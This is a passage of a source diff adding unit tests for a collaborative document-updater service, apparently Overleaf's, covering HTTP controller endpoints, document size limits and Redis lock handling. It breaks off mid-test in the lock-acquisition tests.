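const sinon = require('sinon')

// Stub whose 8th positional argument is treated as a Node-style callback.
const setDocWithLock = sinon.stub().callsArgWith(7, null, { rev: '123' })

setDocWithLock(
  'project-id', 'doc-id', ['lines'], 'dropbox', 'user-id',
  true, // undoing
  true, // external flag (assumed name)
  (err, result) => console.log(err, result) // prints: null { rev: '123' }
)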
+ describe('successfully', function () { + beforeEach(function () { + this.DocumentManager.setDocWithLock = sinon + .stub() + .callsArgWith(7, null, { rev: '123' }) + this.HttpController.setDoc(this.req, this.res, this.next) + }) + + it('should set the doc', function () { + this.DocumentManager.setDocWithLock + .calledWith( + this.project_id, + this.doc_id, + this.lines, + this.source, + this.user_id, + this.undoing, + true + ) + .should.equal(true) + }) + + it('should return a json response with the document rev from web', function () { + this.res.json.calledWithMatch({ rev: '123' }).should.equal(true) + }) + + it('should log the request', function () { + this.logger.debug + .calledWith( + { + docId: this.doc_id, + projectId: this.project_id, + lines: this.lines, + source: this.source, + userId: this.user_id, + undoing: this.undoing, + }, + 'setting doc via http' + ) + .should.equal(true) + }) + + it('should time the request', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + }) + + describe('when an errors occurs', function () { + beforeEach(function () { + this.DocumentManager.setDocWithLock = sinon + .stub() + .callsArgWith(7, new Error('oops')) + this.HttpController.setDoc(this.req, this.res, this.next) + }) + + it('should call next with the error', function () { + this.next.calledWith(sinon.match.instanceOf(Error)).should.equal(true) + }) + }) + + describe('when the payload is too large', function () { + beforeEach(function () { + const lines = [] + for (let _ = 0; _ <= 200000; _++) { + lines.push('test test test') + } + this.req.body.lines = lines + this.DocumentManager.setDocWithLock = sinon.stub().callsArgWith(6) + this.HttpController.setDoc(this.req, this.res, this.next) + }) + + it('should send back a 406 response', function () { + this.res.sendStatus.calledWith(406).should.equal(true) + }) + + it('should not call setDocWithLock', function () { + this.DocumentManager.setDocWithLock.callCount.should.equal(0) + }) + }) + }) + + describe('flushProject', function () { + beforeEach(function () { + this.req = { + params: { + project_id: this.project_id, + }, + query: {}, + body: {}, + } + }) + + describe('successfully', function () { + beforeEach(function () { + this.ProjectManager.flushProjectWithLocks = sinon.stub().callsArgWith(1) + this.HttpController.flushProject(this.req, this.res, this.next) + }) + + it('should flush the project', function () { + this.ProjectManager.flushProjectWithLocks + .calledWith(this.project_id) + .should.equal(true) + }) + + it('should return a successful No Content response', function () { + this.res.sendStatus.calledWith(204).should.equal(true) + }) + + it('should log the request', function () { + this.logger.debug + .calledWith( + { projectId: this.project_id }, + 'flushing project via http' + ) + .should.equal(true) + }) + + it('should time the request', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + }) + + describe('when an errors occurs', function () { + beforeEach(function () { + this.ProjectManager.flushProjectWithLocks = sinon + .stub() + .callsArgWith(1, new Error('oops')) + this.HttpController.flushProject(this.req, this.res, this.next) + }) + + it('should call next with the error', function () { + this.next.calledWith(sinon.match.instanceOf(Error)).should.equal(true) + }) + }) + }) + + describe('flushDocIfLoaded', function () { + beforeEach(function () { + this.lines = ['one', 'two', 'three'] + this.version = 42 + this.req = { + params: { + project_id: this.project_id, + 
doc_id: this.doc_id, + }, + query: {}, + body: {}, + } + }) + + describe('successfully', function () { + beforeEach(function () { + this.DocumentManager.flushDocIfLoadedWithLock = sinon + .stub() + .callsArgWith(2) + this.HttpController.flushDocIfLoaded(this.req, this.res, this.next) + }) + + it('should flush the doc', function () { + this.DocumentManager.flushDocIfLoadedWithLock + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should return a successful No Content response', function () { + this.res.sendStatus.calledWith(204).should.equal(true) + }) + + it('should log the request', function () { + this.logger.debug + .calledWith( + { docId: this.doc_id, projectId: this.project_id }, + 'flushing doc via http' + ) + .should.equal(true) + }) + + it('should time the request', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + }) + + describe('when an errors occurs', function () { + beforeEach(function () { + this.DocumentManager.flushDocIfLoadedWithLock = sinon + .stub() + .callsArgWith(2, new Error('oops')) + this.HttpController.flushDocIfLoaded(this.req, this.res, this.next) + }) + + it('should call next with the error', function () { + this.next.calledWith(sinon.match.instanceOf(Error)).should.equal(true) + }) + }) + }) + + describe('deleteDoc', function () { + beforeEach(function () { + this.req = { + params: { + project_id: this.project_id, + doc_id: this.doc_id, + }, + query: {}, + body: {}, + } + }) + + describe('successfully', function () { + beforeEach(function () { + this.DocumentManager.flushAndDeleteDocWithLock = sinon + .stub() + .callsArgWith(3) + this.HttpController.deleteDoc(this.req, this.res, this.next) + }) + + it('should flush and delete the doc', function () { + this.DocumentManager.flushAndDeleteDocWithLock + .calledWith(this.project_id, this.doc_id, { + ignoreFlushErrors: false, + }) + .should.equal(true) + }) + + it('should flush project history', function () { + this.HistoryManager.flushProjectChangesAsync + .calledWithExactly(this.project_id) + .should.equal(true) + }) + + it('should return a successful No Content response', function () { + this.res.sendStatus.calledWith(204).should.equal(true) + }) + + it('should log the request', function () { + this.logger.debug + .calledWith( + { docId: this.doc_id, projectId: this.project_id }, + 'deleting doc via http' + ) + .should.equal(true) + }) + + it('should time the request', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + }) + + describe('ignoring errors', function () { + beforeEach(function () { + this.req.query.ignore_flush_errors = 'true' + this.DocumentManager.flushAndDeleteDocWithLock = sinon.stub().yields() + this.HttpController.deleteDoc(this.req, this.res, this.next) + }) + + it('should delete the doc', function () { + this.DocumentManager.flushAndDeleteDocWithLock + .calledWith(this.project_id, this.doc_id, { ignoreFlushErrors: true }) + .should.equal(true) + }) + + it('should return a successful No Content response', function () { + this.res.sendStatus.calledWith(204).should.equal(true) + }) + }) + + describe('when an errors occurs', function () { + beforeEach(function () { + this.DocumentManager.flushAndDeleteDocWithLock = sinon + .stub() + .callsArgWith(3, new Error('oops')) + this.HttpController.deleteDoc(this.req, this.res, this.next) + }) + + it('should flush project history', function () { + this.HistoryManager.flushProjectChangesAsync + .calledWithExactly(this.project_id) + .should.equal(true) + }) + + 
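// Note: even when the flush-and-delete fails, deleteDoc still kicks off an + // async project history flush (asserted above) before handing the error to + // next() (asserted below), so history is not left stale by a failed delete. +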
it('should call next with the error', function () { + this.next.calledWith(sinon.match.instanceOf(Error)).should.equal(true) + }) + }) + }) + + describe('deleteProject', function () { + beforeEach(function () { + this.req = { + params: { + project_id: this.project_id, + }, + query: {}, + body: {}, + } + }) + + describe('successfully', function () { + beforeEach(function () { + this.ProjectManager.flushAndDeleteProjectWithLocks = sinon + .stub() + .callsArgWith(2) + this.HttpController.deleteProject(this.req, this.res, this.next) + }) + + it('should delete the project', function () { + this.ProjectManager.flushAndDeleteProjectWithLocks + .calledWith(this.project_id) + .should.equal(true) + }) + + it('should return a successful No Content response', function () { + this.res.sendStatus.calledWith(204).should.equal(true) + }) + + it('should log the request', function () { + this.logger.debug + .calledWith( + { projectId: this.project_id }, + 'deleting project via http' + ) + .should.equal(true) + }) + + it('should time the request', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + }) + + describe('with the background=true option from realtime', function () { + beforeEach(function () { + this.ProjectManager.queueFlushAndDeleteProject = sinon + .stub() + .callsArgWith(1) + this.req.query = { background: true, shutdown: true } + this.HttpController.deleteProject(this.req, this.res, this.next) + }) + + it('should queue the flush and delete', function () { + this.ProjectManager.queueFlushAndDeleteProject + .calledWith(this.project_id) + .should.equal(true) + }) + }) + + describe('when an error occurs', function () { + beforeEach(function () { + this.ProjectManager.flushAndDeleteProjectWithLocks = sinon + .stub() + .callsArgWith(2, new Error('oops')) + this.HttpController.deleteProject(this.req, this.res, this.next) + }) + + it('should call next with the error', function () { + this.next.calledWith(sinon.match.instanceOf(Error)).should.equal(true) + }) + }) + }) + + describe('acceptChanges', function () { + beforeEach(function () { + this.req = { + params: { + project_id: this.project_id, + doc_id: this.doc_id, + change_id: (this.change_id = 'mock-change-id-1'), + }, + query: {}, + body: {}, + } + }) + + describe('successfully with a single change', function () { + beforeEach(function () { + this.DocumentManager.acceptChangesWithLock = sinon + .stub() + .callsArgWith(3) + this.HttpController.acceptChanges(this.req, this.res, this.next) + }) + + it('should accept the change', function () { + this.DocumentManager.acceptChangesWithLock + .calledWith(this.project_id, this.doc_id, [this.change_id]) + .should.equal(true) + }) + + it('should return a successful No Content response', function () { + this.res.sendStatus.calledWith(204).should.equal(true) + }) + + it('should log the request', function () { + this.logger.debug + .calledWith( + { projectId: this.project_id, docId: this.doc_id }, + 'accepting 1 changes via http' + ) + .should.equal(true) + }) + + it('should time the request', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + }) + + describe('successfully with multiple changes', function () { + beforeEach(function () { + this.change_ids = [ + 'mock-change-id-1', + 'mock-change-id-2', + 'mock-change-id-3', + 'mock-change-id-4', + ] + this.req.body = { change_ids: this.change_ids } + this.DocumentManager.acceptChangesWithLock = sinon + .stub() + .callsArgWith(3) + this.HttpController.acceptChanges(this.req, this.res, this.next)
+ }) + + it('should accept the changes in the body payload', function () { + this.DocumentManager.acceptChangesWithLock + .calledWith(this.project_id, this.doc_id, this.change_ids) + .should.equal(true) + }) + + it('should log the request with the correct number of changes', function () { + this.logger.debug + .calledWith( + { projectId: this.project_id, docId: this.doc_id }, + `accepting ${this.change_ids.length} changes via http` + ) + .should.equal(true) + }) + }) + + describe('when an errors occurs', function () { + beforeEach(function () { + this.DocumentManager.acceptChangesWithLock = sinon + .stub() + .callsArgWith(3, new Error('oops')) + this.HttpController.acceptChanges(this.req, this.res, this.next) + }) + + it('should call next with the error', function () { + this.next.calledWith(sinon.match.instanceOf(Error)).should.equal(true) + }) + }) + }) + + describe('resolveComment', function () { + beforeEach(function () { + this.user_id = 'user-id-123' + this.req = { + params: { + project_id: this.project_id, + doc_id: this.doc_id, + comment_id: (this.comment_id = 'mock-comment-id'), + }, + query: {}, + body: { + user_id: this.user_id, + }, + } + this.resolved = true + }) + + describe('successfully', function () { + beforeEach(function (done) { + this.DocumentManager.updateCommentStateWithLock = sinon + .stub() + .callsArgWith(5) + + this.ProjectHistoryRedisManager.queueOps = sinon.stub() + this.res.sendStatus.callsFake(() => done()) + this.HttpController.resolveComment(this.req, this.res, this.next) + }) + + it('should accept the change', function () { + this.DocumentManager.updateCommentStateWithLock + .calledWith( + this.project_id, + this.doc_id, + this.comment_id, + this.user_id, + this.resolved + ) + .should.equal(true) + }) + + it('should return a successful No Content response', function () { + this.res.sendStatus.calledWith(204).should.equal(true) + }) + + it('should log the request', function () { + this.logger.debug + .calledWith( + { + projectId: this.project_id, + docId: this.doc_id, + commentId: this.comment_id, + }, + 'resolving comment via http' + ) + .should.equal(true) + }) + }) + + describe('when an errors occurs', function () { + beforeEach(function () { + this.DocumentManager.updateCommentStateWithLock = sinon + .stub() + .callsArgWith(5, new Error('oops')) + this.HttpController.resolveComment(this.req, this.res, this.next) + }) + + it('should call next with the error', function () { + this.next.calledWith(sinon.match.instanceOf(Error)).should.equal(true) + }) + }) + }) + + describe('reopenComment', function () { + beforeEach(function () { + this.user_id = 'user-id-123' + this.req = { + params: { + project_id: this.project_id, + doc_id: this.doc_id, + comment_id: (this.comment_id = 'mock-comment-id'), + }, + query: {}, + body: { + user_id: this.user_id, + }, + } + this.resolved = false + }) + + describe('successfully', function () { + beforeEach(function () { + this.DocumentManager.updateCommentStateWithLock = sinon + .stub() + .callsArgWith(5) + + this.ProjectHistoryRedisManager.queueOps = sinon.stub() + this.HttpController.reopenComment(this.req, this.res, this.next) + }) + + it('should accept the change', function () { + this.DocumentManager.updateCommentStateWithLock + .calledWith( + this.project_id, + this.doc_id, + this.comment_id, + this.user_id, + this.resolved + ) + .should.equal(true) + }) + + it('should return a successful No Content response', function () { + this.res.sendStatus.calledWith(204).should.equal(true) + }) + + it('should log the request', 
function () { + this.logger.debug + .calledWith( + { + projectId: this.project_id, + docId: this.doc_id, + commentId: this.comment_id, + }, + 'reopening comment via http' + ) + .should.equal(true) + }) + }) + + describe('when an errors occurs', function () { + beforeEach(function () { + this.DocumentManager.updateCommentStateWithLock = sinon + .stub() + .callsArgWith(5, new Error('oops')) + this.HttpController.reopenComment(this.req, this.res, this.next) + }) + + it('should call next with the error', function () { + this.next.calledWith(sinon.match.instanceOf(Error)).should.equal(true) + }) + }) + }) + + describe('deleteComment', function () { + beforeEach(function () { + this.user_id = 'user-id-123' + this.req = { + params: { + project_id: this.project_id, + doc_id: this.doc_id, + comment_id: (this.comment_id = 'mock-comment-id'), + }, + query: {}, + body: { + user_id: this.user_id, + }, + } + }) + + describe('successfully', function () { + beforeEach(function () { + this.DocumentManager.deleteCommentWithLock = sinon + .stub() + .callsArgWith(4) + + this.ProjectHistoryRedisManager.queueOps = sinon.stub() + this.HttpController.deleteComment(this.req, this.res, this.next) + }) + + it('should accept the change', function () { + this.DocumentManager.deleteCommentWithLock + .calledWith( + this.project_id, + this.doc_id, + this.comment_id, + this.user_id + ) + .should.equal(true) + }) + + it('should return a successful No Content response', function () { + this.res.sendStatus.calledWith(204).should.equal(true) + }) + + it('should log the request', function () { + this.logger.debug + .calledWith( + { + projectId: this.project_id, + docId: this.doc_id, + commentId: this.comment_id, + }, + 'deleting comment via http' + ) + .should.equal(true) + }) + + it('should time the request', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + }) + + describe('when an errors occurs', function () { + beforeEach(function () { + this.DocumentManager.deleteCommentWithLock = sinon + .stub() + .callsArgWith(4, new Error('oops')) + this.HttpController.deleteComment(this.req, this.res, this.next) + }) + + it('should call next with the error', function () { + this.next.calledWith(sinon.match.instanceOf(Error)).should.equal(true) + }) + }) + }) + + describe('getProjectDocsAndFlushIfOld', function () { + beforeEach(function () { + this.state = '01234567890abcdef' + this.docs = [ + { _id: '1234', lines: 'hello', v: 23 }, + { _id: '4567', lines: 'world', v: 45 }, + ] + this.req = { + params: { + project_id: this.project_id, + }, + query: { + state: this.state, + }, + body: {}, + } + }) + + describe('successfully', function () { + beforeEach(function () { + this.ProjectManager.getProjectDocsAndFlushIfOld = sinon + .stub() + .callsArgWith(3, null, this.docs) + this.HttpController.getProjectDocsAndFlushIfOld( + this.req, + this.res, + this.next + ) + }) + + it('should get docs from the project manager', function () { + this.ProjectManager.getProjectDocsAndFlushIfOld + .calledWith(this.project_id, this.state, {}) + .should.equal(true) + }) + + it('should return a successful response', function () { + this.res.send.calledWith(this.docs).should.equal(true) + }) + + it('should log the request', function () { + this.logger.debug + .calledWith( + { projectId: this.project_id, exclude: [] }, + 'getting docs via http' + ) + .should.equal(true) + }) + + it('should log the response', function () { + this.logger.debug + .calledWith( + { projectId: this.project_id, result: ['1234:23', '4567:45'] }, + 'got 
docs via http' + ) + .should.equal(true) + }) + + it('should time the request', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + }) + + describe('when there is a conflict', function () { + beforeEach(function () { + this.ProjectManager.getProjectDocsAndFlushIfOld = sinon + .stub() + .callsArgWith( + 3, + new Errors.ProjectStateChangedError('project state changed') + ) + this.HttpController.getProjectDocsAndFlushIfOld( + this.req, + this.res, + this.next + ) + }) + + it('should return an HTTP 409 Conflict response', function () { + this.res.sendStatus.calledWith(409).should.equal(true) + }) + }) + + describe('when an error occurs', function () { + beforeEach(function () { + this.ProjectManager.getProjectDocsAndFlushIfOld = sinon + .stub() + .callsArgWith(3, new Error('oops')) + this.HttpController.getProjectDocsAndFlushIfOld( + this.req, + this.res, + this.next + ) + }) + + it('should call next with the error', function () { + this.next.calledWith(sinon.match.instanceOf(Error)).should.equal(true) + }) + }) + }) + + describe('updateProject', function () { + beforeEach(function () { + this.projectHistoryId = 'history-id-123' + this.userId = 'user-id-123' + this.updates = [ + { + type: 'rename-doc', + id: 1, + pathname: 'thesis.tex', + newPathname: 'book.tex', + }, + { type: 'add-doc', id: 2, pathname: 'article.tex', docLines: 'hello' }, + { + type: 'rename-file', + id: 3, + pathname: 'apple.png', + newPathname: 'banana.png', + }, + { type: 'add-file', id: 4, url: 'filestore.example.com/4' }, + ] + this.version = 1234567 + this.req = { + query: {}, + body: { + projectHistoryId: this.projectHistoryId, + userId: this.userId, + updates: this.updates, + version: this.version, + source: this.source, + }, + params: { + project_id: this.project_id, + }, + } + }) + + describe('successfully', function () { + beforeEach(function () { + this.ProjectManager.updateProjectWithLocks = sinon.stub().yields() + this.HttpController.updateProject(this.req, this.res, this.next) + }) + + it('should accept the change', function () { + this.ProjectManager.updateProjectWithLocks + .calledWith( + this.project_id, + this.projectHistoryId, + this.userId, + this.updates, + this.version, + this.source + ) + .should.equal(true) + }) + + it('should return a successful No Content response', function () { + this.res.sendStatus.calledWith(204).should.equal(true) + }) + + it('should time the request', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + }) + + describe('when an errors occurs', function () { + beforeEach(function () { + this.ProjectManager.updateProjectWithLocks = sinon + .stub() + .yields(new Error('oops')) + this.HttpController.updateProject(this.req, this.res, this.next) + }) + + it('should call next with the error', function () { + this.next.calledWith(sinon.match.instanceOf(Error)).should.equal(true) + }) + }) + }) + + describe('resyncProjectHistory', function () { + beforeEach(function () { + this.projectHistoryId = 'history-id-123' + this.docs = sinon.stub() + this.files = sinon.stub() + this.fileUpdates = sinon.stub() + this.req = { + query: {}, + body: { + projectHistoryId: this.projectHistoryId, + docs: this.docs, + files: this.files, + }, + params: { + project_id: this.project_id, + }, + } + }) + + describe('successfully', function () { + beforeEach(function () { + this.HistoryManager.resyncProjectHistory = sinon.stub().callsArgWith(5) + this.HttpController.resyncProjectHistory(this.req, this.res, this.next) + }) + + it('should accept the 
change', function () { + this.HistoryManager.resyncProjectHistory + .calledWith( + this.project_id, + this.projectHistoryId, + this.docs, + this.files, + {} + ) + .should.equal(true) + }) + + it('should return a successful No Content response', function () { + this.res.sendStatus.should.have.been.calledWith(204) + }) + }) + + describe('when an errors occurs', function () { + beforeEach(function () { + this.HistoryManager.resyncProjectHistory = sinon + .stub() + .callsArgWith(5, new Error('oops')) + this.HttpController.resyncProjectHistory(this.req, this.res, this.next) + }) + + it('should call next with the error', function () { + this.next.calledWith(sinon.match.instanceOf(Error)).should.equal(true) + }) + }) + }) + + describe('appendToDoc', function () { + beforeEach(function () { + this.lines = ['one', 'two', 'three'] + this.source = 'dropbox' + this.user_id = 'user-id-123' + this.req = { + headers: {}, + params: { + project_id: this.project_id, + doc_id: this.doc_id, + }, + query: {}, + body: { + lines: this.lines, + source: this.source, + user_id: this.user_id, + undoing: (this.undoing = true), + }, + } + }) + + describe('successfully', function () { + beforeEach(function () { + this.DocumentManager.appendToDocWithLock = sinon + .stub() + .callsArgWith(5, null, { rev: '123' }) + this.HttpController.appendToDoc(this.req, this.res, this.next) + }) + + it('should append to the doc', function () { + this.DocumentManager.appendToDocWithLock + .calledWith( + this.project_id, + this.doc_id, + this.lines, + this.source, + this.user_id + ) + .should.equal(true) + }) + + it('should return a json response with the document rev from web', function () { + this.res.json.calledWithMatch({ rev: '123' }).should.equal(true) + }) + + it('should log the request', function () { + this.logger.debug + .calledWith( + { + docId: this.doc_id, + projectId: this.project_id, + lines: this.lines, + source: this.source, + userId: this.user_id, + }, + 'appending to doc via http' + ) + .should.equal(true) + }) + + it('should time the request', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + }) + + describe('when an errors occurs', function () { + beforeEach(function () { + this.DocumentManager.appendToDocWithLock = sinon + .stub() + .callsArgWith(5, new Error('oops')) + this.HttpController.appendToDoc(this.req, this.res, this.next) + }) + + it('should call next with the error', function () { + this.next.calledWith(sinon.match.instanceOf(Error)).should.equal(true) + }) + }) + + describe('when the payload is too large', function () { + beforeEach(function () { + this.DocumentManager.appendToDocWithLock = sinon + .stub() + .callsArgWith(5, new Errors.FileTooLargeError()) + this.HttpController.appendToDoc(this.req, this.res, this.next) + }) + + it('should send back a 422 response', function () { + this.res.sendStatus.calledWith(422).should.equal(true) + }) + }) + }) +}) diff --git a/services/document-updater/test/unit/js/Limits/LimitsTests.js b/services/document-updater/test/unit/js/Limits/LimitsTests.js new file mode 100644 index 0000000..34a5c13 --- /dev/null +++ b/services/document-updater/test/unit/js/Limits/LimitsTests.js @@ -0,0 +1,84 @@ +const { expect } = require('chai') +const modulePath = '../../../../app/js/Limits.js' +const SandboxedModule = require('sandboxed-module') + +describe('Limits', function () { + beforeEach(function () { + return (this.Limits = SandboxedModule.require(modulePath)) + }) + + describe('getTotalSizeOfLines', function () { + it('should compute the 
character count for a document with multiple lines', function () { + const count = this.Limits.getTotalSizeOfLines(['123', '4567']) + expect(count).to.equal(9) + }) + + it('should compute the character count for a document with a single line', function () { + const count = this.Limits.getTotalSizeOfLines(['123']) + expect(count).to.equal(4) + }) + + it('should compute the character count for an empty document', function () { + const count = this.Limits.getTotalSizeOfLines([]) + expect(count).to.equal(0) + }) + }) + + describe('docIsTooLarge', function () { + describe('when the estimated size is below the limit', function () { + it('should return false when the estimated size is below the limit', function () { + const result = this.Limits.docIsTooLarge(128, ['hello', 'world'], 1024) + expect(result).to.be.false + }) + }) + + describe('when the estimated size is at the limit', function () { + it('should return false when the estimated size is at the limit', function () { + const result = this.Limits.docIsTooLarge(1024, ['hello', 'world'], 1024) + expect(result).to.be.false + }) + }) + + describe('when the estimated size is above the limit', function () { + it('should return false when the actual character count is below the limit', function () { + const result = this.Limits.docIsTooLarge(2048, ['hello', 'world'], 1024) + expect(result).to.be.false + }) + + it('should return false when the actual character count is at the limit', function () { + const result = this.Limits.docIsTooLarge(2048, ['x'.repeat(1023)], 1024) + expect(result).to.be.false + }) + + it('should return true when the actual character count is above the limit by 1', function () { + const count = this.Limits.docIsTooLarge(2048, ['x'.repeat(1024)], 1024) + expect(count).to.be.true + }) + + it('should return true when the actual character count is above the limit', function () { + const count = this.Limits.docIsTooLarge(2048, ['x'.repeat(2000)], 1024) + expect(count).to.be.true + }) + }) + + describe('when the document has many lines', function () { + it('should return false when the actual character count is below the limit ', function () { + const count = this.Limits.docIsTooLarge( + 2048, + '1234567890'.repeat(100).split('0'), + 1024 + ) + expect(count).to.be.false + }) + + it('should return true when the actual character count is above the limit', function () { + const count = this.Limits.docIsTooLarge( + 2048, + '1234567890'.repeat(2000).split('0'), + 1024 + ) + expect(count).to.be.true + }) + }) + }) +}) diff --git a/services/document-updater/test/unit/js/LockManager/CheckingTheLock.js b/services/document-updater/test/unit/js/LockManager/CheckingTheLock.js new file mode 100644 index 0000000..575ed90 --- /dev/null +++ b/services/document-updater/test/unit/js/LockManager/CheckingTheLock.js @@ -0,0 +1,65 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
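Context for the tests below: the lock is a plain Redis key named Blocking:<docId>, and checking it is a single EXISTS call. A minimal sketch of the behaviour being pinned down (an illustrative reimplementation, not the module itself):

// The lock is free exactly when the blocking key is absent.
function checkLock(rclient, docId, callback) {
  rclient.exists(`Blocking:${docId}`, (error, exists) => {
    if (error) return callback(error)
    callback(null, parseInt(exists, 10) === 0)
  })
}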
+/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS206: Consider reworking classes to avoid initClass + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const assert = require('node:assert') +const path = require('node:path') +const modulePath = path.join(__dirname, '../../../../app/js/LockManager.js') +const projectId = 1234 +const docId = 5678 +const blockingKey = `Blocking:${docId}` +const SandboxedModule = require('sandboxed-module') + +describe('LockManager - checking the lock', function () { + let Profiler + const existsStub = sinon.stub() + + const mocks = { + '@overleaf/redis-wrapper': { + createClient() { + return { + auth() {}, + exists: existsStub, + } + }, + }, + '@overleaf/metrics': { inc() {} }, + './Profiler': (Profiler = (function () { + Profiler = class Profiler { + static initClass() { + this.prototype.log = sinon.stub().returns({ end: sinon.stub() }) + this.prototype.end = sinon.stub() + } + } + Profiler.initClass() + return Profiler + })()), + } + const LockManager = SandboxedModule.require(modulePath, { requires: mocks }) + + it('should return true if the key does not exist', function (done) { + existsStub.yields(null, '0') + return LockManager.checkLock(docId, (err, free) => { + if (err) return done(err) + free.should.equal(true) + return done() + }) + }) + + return it('should return false if the key does exist', function (done) { + existsStub.yields(null, '1') + return LockManager.checkLock(docId, (err, free) => { + if (err) return done(err) + free.should.equal(false) + return done() + }) + }) +}) diff --git a/services/document-updater/test/unit/js/LockManager/ReleasingTheLock.js b/services/document-updater/test/unit/js/LockManager/ReleasingTheLock.js new file mode 100644 index 0000000..a39a3b4 --- /dev/null +++ b/services/document-updater/test/unit/js/LockManager/ReleasingTheLock.js @@ -0,0 +1,94 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint.
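The release path below asserts the classic compare-and-delete pattern: a Lua script deletes the key only if it still holds this client's lock value, so a client can never free a lock that expired and was re-acquired by someone else. A sketch of that shape, assuming the standard script (LockManager.unlockScript is the real constant; this reimplementation is illustrative):

const unlockScript = `
  if redis.call("get", KEYS[1]) == ARGV[1] then
    return redis.call("del", KEYS[1])
  else
    return 0
  end`

function releaseLock(rclient, docId, lockValue, callback) {
  rclient.eval(unlockScript, 1, `Blocking:${docId}`, lockValue, (error, result) => {
    if (error) return callback(error)
    // 1: we still held the lock and deleted it; 0: it expired under us.
    if (result === 1) return callback()
    callback(new Error('lock expired before it was released'))
  })
}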
+/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS206: Consider reworking classes to avoid initClass + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const assert = require('node:assert') +const path = require('node:path') +const modulePath = path.join(__dirname, '../../../../app/js/LockManager.js') +const projectId = 1234 +const docId = 5678 +const SandboxedModule = require('sandboxed-module') + +describe('LockManager - releasing the lock', function () { + beforeEach(function () { + let Profiler + this.client = { + auth() {}, + eval: sinon.stub(), + } + const mocks = { + '@overleaf/redis-wrapper': { + createClient: () => this.client, + }, + '@overleaf/settings': { + redis: { + lock: { + key_schema: { + blockingKey({ doc_id: docId }) { + return `Blocking:${docId}` + }, + }, + }, + }, + }, + '@overleaf/metrics': { inc() {} }, + './Profiler': (Profiler = (function () { + Profiler = class Profiler { + static initClass() { + this.prototype.log = sinon.stub().returns({ end: sinon.stub() }) + this.prototype.end = sinon.stub() + } + } + Profiler.initClass() + return Profiler + })()), + } + this.LockManager = SandboxedModule.require(modulePath, { requires: mocks }) + this.lockValue = 'lock-value-stub' + return (this.callback = sinon.stub()) + }) + + describe('when the lock is current', function () { + beforeEach(function () { + this.client.eval = sinon.stub().yields(null, 1) + return this.LockManager.releaseLock(docId, this.lockValue, this.callback) + }) + + it('should clear the data from redis', function () { + return this.client.eval + .calledWith( + this.LockManager.unlockScript, + 1, + `Blocking:${docId}`, + this.lockValue + ) + .should.equal(true) + }) + + return it('should call the callback', function () { + return this.callback.called.should.equal(true) + }) + }) + + return describe('when the lock has expired', function () { + beforeEach(function () { + this.client.eval = sinon.stub().yields(null, 0) + return this.LockManager.releaseLock(docId, this.lockValue, this.callback) + }) + + return it('should return an error if the lock has expired', function () { + return this.callback + .calledWith(sinon.match.instanceOf(Error)) + .should.equal(true) + }) + }) +}) diff --git a/services/document-updater/test/unit/js/LockManager/getLockTests.js b/services/document-updater/test/unit/js/LockManager/getLockTests.js new file mode 100644 index 0000000..938c593 --- /dev/null +++ b/services/document-updater/test/unit/js/LockManager/getLockTests.js @@ -0,0 +1,126 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
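getLock, tested below, layers a retry loop over tryLock: poll until the lock is acquired, waiting LOCK_TEST_INTERVAL ms between attempts, and give up with an error carrying the doc_id once MAX_LOCK_WAIT_TIME ms have elapsed. A sketch of that loop as the tests characterise it (illustrative only):

function getLock(lockManager, docId, callback) {
  const startTime = Date.now()
  function attempt() {
    lockManager.tryLock(docId, (error, gotLock, lockValue) => {
      if (error) return callback(error)
      if (gotLock) return callback(null, lockValue)
      if (Date.now() - startTime > lockManager.MAX_LOCK_WAIT_TIME) {
        const timeoutError = new Error('Timeout')
        timeoutError.doc_id = docId // the tests assert the error carries doc_id
        return callback(timeoutError)
      }
      setTimeout(attempt, lockManager.LOCK_TEST_INTERVAL)
    })
  }
  attempt()
}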
+/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS206: Consider reworking classes to avoid initClass + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const modulePath = '../../../../app/js/LockManager.js' +const SandboxedModule = require('sandboxed-module') + +describe('LockManager - getting the lock', function () { + beforeEach(function () { + let Profiler + this.LockManager = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/redis-wrapper': { + createClient: () => { + return { auth() {} } + }, + }, + '@overleaf/metrics': { inc() {} }, + './Profiler': (Profiler = (function () { + Profiler = class Profiler { + static initClass() { + this.prototype.log = sinon.stub().returns({ end: sinon.stub() }) + this.prototype.end = sinon.stub() + } + } + Profiler.initClass() + return Profiler + })()), + }, + }) + this.callback = sinon.stub() + return (this.doc_id = 'doc-id-123') + }) + + describe('when the lock is not set', function () { + beforeEach(function (done) { + this.lockValue = 'mock-lock-value' + this.LockManager.tryLock = sinon + .stub() + .callsArgWith(1, null, true, this.lockValue) + return this.LockManager.getLock(this.doc_id, (...args) => { + this.callback(...Array.from(args || [])) + return done() + }) + }) + + it('should try to get the lock', function () { + return this.LockManager.tryLock.calledWith(this.doc_id).should.equal(true) + }) + + it('should only need to try once', function () { + return this.LockManager.tryLock.callCount.should.equal(1) + }) + + return it('should return the callback with the lock value', 